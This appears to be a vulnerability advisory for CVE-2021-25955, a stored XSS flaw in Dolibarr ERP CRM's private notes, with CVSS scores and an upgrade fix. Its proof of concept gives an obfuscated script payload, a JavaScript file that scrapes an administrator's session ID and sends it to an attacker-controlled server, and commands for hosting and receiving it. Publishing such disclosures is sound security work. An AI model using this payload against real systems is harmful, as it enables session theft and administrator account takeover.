
We found results for “”
CVE-2021-25955
Date: August 15, 2021
Details
The “Dolibarr ERP CRM”, WYSIWYG Editor module is affected by a stored XSS vulnerability that allows low privileged application users to store malicious scripts in the Private Note field at “/adherents/note.php?id=1” endpoint. These scripts are executed in a victim’s browser when they open the page containing the vulnerable field.In the worst case, the victim who inadvertently triggers the attack is a highly privileged administrator, so the injected scripts can extract the Session ID, which can lead to full Account takeover and as due to other vulnerability (Improper Access Control on Private notes) a low privileged user can update the private notes which could lead to privilege escalation.
PoC Details
For demonstration purposes we will use two users:1. “member1” (permissions to “Read members” and “Create/modify members”)
2. “admin” (administrator).
Create a malicious JS file that sends session id to the attacker over a GET request.
Run a PHP Simple Server to host the malicious file.
Run a Python Simple HTTP Server to get the extracted Session ID.
Login to the application as member1. Go to My Dashboard option on the left pane and select member1 from the “Latest 5 members” section. Go to the Note option from the navigation bar and edit the public note, provide the payload in the field and capture the request with a web proxy (example: burp suite). Then modify the request captured above by converting public to private (in 3 parameters) and forward the request.
Login with “admin” user and go to the same endpoint and you will find that a private note has been created. Administrator clicks on the private note initiating the malicious script.
At our python server the attacker received the Session ID of the administrator. Using the Session ID captured above, the attacker can login as Administrator.
PoC Code
// Payload:
<a href="j	a	v	asc
ri	pt:var re;x=new XMLHttpRequest;x.onload%0d=function(){var ur='http://192.168.18.37:8090/test.js';$.getScript(ur);};x.open('GET','http://192.168.18.36/');x.send();">Click to Get !!hacked!!</a>
// File (test.js) contents:
var te = /[0-9a-zA-Z]+/gm;
var re;
x=new XMLHttpRequest;
x.onload=function(){
re = this.responseText;
var reg = /Session\sID\S+\s\S+/gm;
console.log(((re.match(reg))[0].match(te))[6]);
var sessionId=((re.match(reg))[0].match(te))[6];
var url = "http://192.168.18.37:9999/" + sessionId;
$.ajax(url);
};
x.open('GET','http://192.168.18.36/admin/system/dolibarr.php', true);
x.withCredentials = true;a
x.send(null);
// Command to run the Python Simple http Server to get the extracted Session ID.
Python3 –m http.server 9999
// Command to run the PHP Simple Server to host the malicious file.
php –S 192.168.18.37:8090
Affected Environments
2.8.1-13.0.2Prevention
Upgrade to version 14.0.0Language: PHP
Good to know:

Base Score: |
|
---|---|
Attack Vector (AV): | Network |
Attack Complexity (AC): | Low |
Privileges Required (PR): | Low |
User Interaction (UI): | Required |
Scope (S): | Changed |
Confidentiality (C): | High |
Integrity (I): | High |
Availability (A): | High |
Base Score: |
|
---|---|
Access Vector (AV): | Network |
Access Complexity (AC): | Medium |
Authentication (AU): | Single |
Confidentiality (C): | None |
Integrity (I): | Partial |
Availability (A): | None |
Additional information: |